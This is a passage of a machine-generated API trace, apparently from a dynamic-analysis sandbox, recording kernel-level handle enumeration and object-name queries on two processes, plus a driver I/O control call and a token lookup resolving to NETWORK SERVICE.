Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698e3300, HandleInformation=0x0) returned 0x0 [0289.946] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.946] PsReleaseProcessExitSynchronization () returned 0x2 [0289.946] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300d9 [0289.946] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.946] ObfDereferenceObject (Object=0xffffe000698e3300) returned 0x800b [0289.946] IoCompleteRequest () returned 0x0 [0289.946] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.946] PsAcquireProcessExitSynchronization () returned 0x0 [0289.946] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.946] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698e8aa0, HandleInformation=0x0) returned 0x0 [0289.946] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.946] PsReleaseProcessExitSynchronization () returned 0x2 [0289.946] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300d8 [0289.946] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.946] ObfDereferenceObject (Object=0xffffe000698e8aa0) returned 0x7fff [0289.946] IoCompleteRequest () returned 0x0 [0289.946] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.946] PsAcquireProcessExitSynchronization () returned 0x0 [0289.946] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.946] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698e3540, HandleInformation=0x0) returned 0x0 [0289.946] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.947] PsReleaseProcessExitSynchronization () returned 0x2 [0289.947] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300d7 [0289.947] ObQueryNameString (in: Object=0xffffe000698e3540, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.947] ObfDereferenceObject (Object=0xffffe000698e3540) returned 0x7fff [0289.947] IoCompleteRequest () returned 0x0 [0289.947] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.947] PsAcquireProcessExitSynchronization () returned 0x0 [0289.947] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.947] ObReferenceObjectByHandle (in: Handle=0x234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006990e480, HandleInformation=0x0) returned 0x0 [0289.947] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.947] PsReleaseProcessExitSynchronization () returned 0x2 [0289.947] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300d6 [0289.947] ObQueryNameString (in: Object=0xffffe0006990e480, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.947] ObfDereferenceObject (Object=0xffffe0006990e480) returned 0x74bb [0289.947] IoCompleteRequest () returned 0x0 [0289.947] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.947] PsAcquireProcessExitSynchronization () returned 0x0 [0289.947] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.947] ObReferenceObjectByHandle (in: Handle=0x358, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a9f090, HandleInformation=0x0) returned 0x0 [0289.947] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.947] PsReleaseProcessExitSynchronization () returned 0x2 [0289.947] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300d5 [0289.947] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.947] ObfDereferenceObject (Object=0xffffe00069a9f090) returned 0x7fe2 [0289.947] IoCompleteRequest () returned 0x0 [0289.947] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.947] PsAcquireProcessExitSynchronization () returned 0x0 [0289.947] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.947] ObReferenceObjectByHandle (in: Handle=0x378, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a06770, HandleInformation=0x0) returned 0x0 [0289.947] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.947] PsReleaseProcessExitSynchronization () returned 0x2 [0289.947] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300d4 [0289.947] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.947] ObfDereferenceObject (Object=0xffffe00069a06770) returned 0x7fe0 [0289.947] IoCompleteRequest () returned 0x0 [0289.947] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.947] PsAcquireProcessExitSynchronization () returned 0x0 [0289.947] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.947] ObReferenceObjectByHandle (in: Handle=0x384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069aafd10, HandleInformation=0x0) returned 0x0 [0289.947] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.947] PsReleaseProcessExitSynchronization () returned 0x2 [0289.948] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300d3 [0289.948] ObQueryNameString (in: Object=0xffffe00069aafd10, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.948] ObfDereferenceObject (Object=0xffffe00069aafd10) returned 0x7fe7 [0289.948] IoCompleteRequest () returned 0x0 [0289.948] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.948] PsAcquireProcessExitSynchronization () returned 0x0 [0289.948] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.948] ObReferenceObjectByHandle (in: Handle=0x3b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b51f20, HandleInformation=0x0) returned 0x0 [0289.948] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.948] PsReleaseProcessExitSynchronization () returned 0x2 [0289.948] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300d2 [0289.948] ObQueryNameString (in: Object=0xffffe00069b51f20, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.948] ObfDereferenceObject (Object=0xffffe00069b51f20) returned 0x7f71 [0289.948] IoCompleteRequest () returned 0x0 [0289.948] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.948] PsAcquireProcessExitSynchronization () returned 0x0 [0289.948] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.948] ObReferenceObjectByHandle (in: Handle=0x418, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bbbae0, HandleInformation=0x0) returned 0x0 [0289.948] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.948] PsReleaseProcessExitSynchronization () returned 0x2 [0289.948] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300d1 [0289.948] ObQueryNameString (in: Object=0xffffe00069bbbae0, ObjectNameInfo=0xffffe0006a6dd7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6dd7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.948] ObfDereferenceObject (Object=0xffffe00069bbbae0) returned 0x7ffe [0289.948] IoCompleteRequest () returned 0x0 [0289.948] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.948] PsAcquireProcessExitSynchronization () returned 0x0 [0289.948] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.948] ObReferenceObjectByHandle (in: Handle=0x448, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bb97a0, HandleInformation=0x0) returned 0x0 [0289.948] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.948] PsReleaseProcessExitSynchronization () returned 0x2 [0289.948] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300d0 [0289.948] ObQueryNameString (in: Object=0xffffe00069bb97a0, ObjectNameInfo=0xffffe0006a5067c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5067c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.948] ObfDereferenceObject (Object=0xffffe00069bb97a0) returned 0x7ffe [0289.948] IoCompleteRequest () returned 0x0 [0289.948] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.948] PsAcquireProcessExitSynchronization () returned 0x0 [0289.948] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.948] ObReferenceObjectByHandle (in: Handle=0x48c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a8fdb0, HandleInformation=0x0) returned 0x0 [0289.949] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.949] PsReleaseProcessExitSynchronization () returned 0x2 [0289.949] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300cf [0289.949] ObQueryNameString (in: Object=0xffffe00069a8fdb0, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.949] ObfDereferenceObject (Object=0xffffe00069a8fdb0) returned 0x7ffe [0289.949] IoCompleteRequest () returned 0x0 [0289.949] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.949] PsAcquireProcessExitSynchronization () returned 0x0 [0289.949] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.949] ObReferenceObjectByHandle (in: Handle=0x7f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a1422a0, HandleInformation=0x0) returned 0x0 [0289.949] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.949] PsReleaseProcessExitSynchronization () returned 0x2 [0289.950] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300ce [0289.950] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.950] ObfDereferenceObject (Object=0xffffe0006a1422a0) returned 0x800b [0289.950] IoCompleteRequest () returned 0x0 [0289.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x188 [0289.950] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.950] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000699004c0, HandleInformation=0x0) returned 0x0 [0289.950] ObOpenObjectByPointer (in: Object=0xffffe000699004c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.950] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x50013 [0289.950] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe000738dc100 | out: TokenHandle=0xffffe000738dc100*=0x18c) returned 0x0 [0289.950] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.950] IoCompleteRequest () returned 0x0 [0289.950] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.950] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="NETWORK SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.951] CloseHandle (hObject=0x18c) returned 1 [0289.951] CloseHandle (hObject=0x188) returned 1 [0289.951] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.951] PsAcquireProcessExitSynchronization () returned 0x0 [0289.951] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.951] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698f3750, HandleInformation=0x0) returned 0x0 [0289.951] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.951] PsReleaseProcessExitSynchronization () returned 0x2 [0289.951] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48011 [0289.951] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.951] ObfDereferenceObject (Object=0xffffe000698f3750) returned 0x7ffe [0289.951] IoCompleteRequest () returned 0x0 [0289.952] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.952] PsAcquireProcessExitSynchronization () returned 0x0 [0289.952] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.952] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069903cf0, HandleInformation=0x0) returned 0x0 [0289.952] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.952] PsReleaseProcessExitSynchronization () returned 0x2 [0289.952] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48010 [0289.952] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.952] ObfDereferenceObject (Object=0xffffe00069903cf0) returned 0x7ffb [0289.952] IoCompleteRequest () returned 0x0 [0289.952] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.952] PsAcquireProcessExitSynchronization () returned 0x0 [0289.952] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.952] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069905950, HandleInformation=0x0) returned 0x0 [0289.952] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.952] PsReleaseProcessExitSynchronization () returned 0x2 [0289.952] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4800f [0289.952] ObQueryNameString (in: Object=0xffffe00069905950, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.952] ObfDereferenceObject (Object=0xffffe00069905950) returned 0x7ffe [0289.952] IoCompleteRequest () returned 0x0 [0289.952] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.952] PsAcquireProcessExitSynchronization () returned 0x0 [0289.952] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.952] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a909a90, HandleInformation=0x0) returned 0x0 [0289.952] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.952] PsReleaseProcessExitSynchronization () returned 0x2 [0289.952] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4800e [0289.952] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.952] ObfDereferenceObject (Object=0xffffe0006a909a90) returned 0x7ff0 [0289.952] IoCompleteRequest () returned 0x0 [0289.952] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.952] PsAcquireProcessExitSynchronization () returned 0x0 [0289.952] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.952] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068107550, HandleInformation=0x0) returned 0x0 [0289.953] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.953] PsReleaseProcessExitSynchronization () returned 0x2 [0289.953] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4800d [0289.953] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.953] ObfDereferenceObject (Object=0xffffe00068107550) returned 0x7ffd [0289.953] IoCompleteRequest () returned 0x0 [0289.953] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.953] PsAcquireProcessExitSynchronization () returned 0x0 [0289.953] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.953] ObReferenceObjectByHandle (in: Handle=0x194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068109520, HandleInformation=0x0) returned 0x0 [0289.953] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.953] PsReleaseProcessExitSynchronization () returned 0x2 [0289.953] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4800c [0289.953] ObQueryNameString (in: Object=0xffffe00068109520, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.953] ObfDereferenceObject (Object=0xffffe00068109520) returned 0x64c6 [0289.953] IoCompleteRequest () returned 0x0 [0289.953] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.953] PsAcquireProcessExitSynchronization () returned 0x0 [0289.953] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.953] ObReferenceObjectByHandle (in: Handle=0x19c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068108920, HandleInformation=0x0) returned 0x0 [0289.953] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.953] PsReleaseProcessExitSynchronization () returned 0x2 [0289.953] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4800b [0289.953] ObQueryNameString (in: Object=0xffffe00068108920, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.953] ObfDereferenceObject (Object=0xffffe00068108920) returned 0x7fed [0289.953] IoCompleteRequest () returned 0x0 [0289.953] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.953] PsAcquireProcessExitSynchronization () returned 0x0 [0289.953] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.953] ObReferenceObjectByHandle (in: Handle=0x290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a115f20, HandleInformation=0x0) returned 0x0 [0289.953] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.953] PsReleaseProcessExitSynchronization () returned 0x2 [0289.953] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x4800a [0289.953] ObQueryNameString (in: Object=0xffffe0006a115f20, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.953] ObfDereferenceObject (Object=0xffffe0006a115f20) returned 0x7ffc [0289.954] IoCompleteRequest () returned 0x0 [0289.954] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.954] PsAcquireProcessExitSynchronization () returned 0x0 [0289.954] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.954] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069993090, HandleInformation=0x0) returned 0x0 [0289.954] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.954] PsReleaseProcessExitSynchronization () returned 0x2 [0289.954] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48009 [0289.954] ObQueryNameString (in: Object=0xffffe00069993090, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.954] ObfDereferenceObject (Object=0xffffe00069993090) returned 0x7fbc [0289.954] IoCompleteRequest () returned 0x0 [0289.954] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.954] PsAcquireProcessExitSynchronization () returned 0x0 [0289.954] KeStackAttachProcess (in: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000699004c0, ApcState=0xffffd000ac0cf400) [0289.954] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069873230, HandleInformation=0x0) returned 0x0 [0289.954] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.954] PsReleaseProcessExitSynchronization () returned 0x2 [0289.954] ObfDereferenceObject (Object=0xffffe000699004c0) returned 0x48008 [0289.954] ObQueryNameString (in: Object=0xffffe0006901cc00, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.954] ObfDereferenceObject (Object=0xffffe00069873230) returned 0x7fff [0289.954] IoCompleteRequest () returned 0x0 [0289.954] 